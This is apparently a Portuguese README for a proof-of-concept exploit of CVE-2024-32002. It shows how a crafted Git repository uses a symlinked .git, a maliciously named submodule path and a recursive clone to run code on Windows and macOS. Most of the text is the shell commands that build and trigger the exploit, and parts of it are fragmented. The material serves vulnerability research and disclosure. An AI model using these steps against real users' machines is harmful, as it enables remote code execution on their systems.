
Prova de conceito de exploit para CVE-2024-32002, demonstrando execução remota de código via submódulos Git maliciosos em sistemas de arquivos insensíveis a maiúsculas/minúsculas.
Uma POC para CVE-2024-32002 demonstrando Execução Remota de Código (RCE).
Veja cve-2024-32002-poc-rce para o repositório de submódulo relacionado.
.git..gitmodules que define o submódulo malicioso.Este repositório foi criado no Linux (WSL2, para ser específico). Isso é importante, o repositório malicioso só pode ser criado em um sistema de arquivos sensível a maiúsculas/minúsculas.
ln -s .git submodule
Notas:
git submodule add --name rce/notexists https://github.com/JakobTheDev/cve-2024-32002-submodule-rce.git Submodule/modules/rce
Notas:
.git que rastreia o status do git para submódulos.Esta vulnerabilidade afeta apenas Windows e MacOS, pois ambos possuem sistemas de arquivos que não diferenciam maiúsculas de minúsculas.
git --version
git clone --recursive --config core.symlinks=true https://github.com/JakobTheDev/cve-2024-32002-poc-rce.git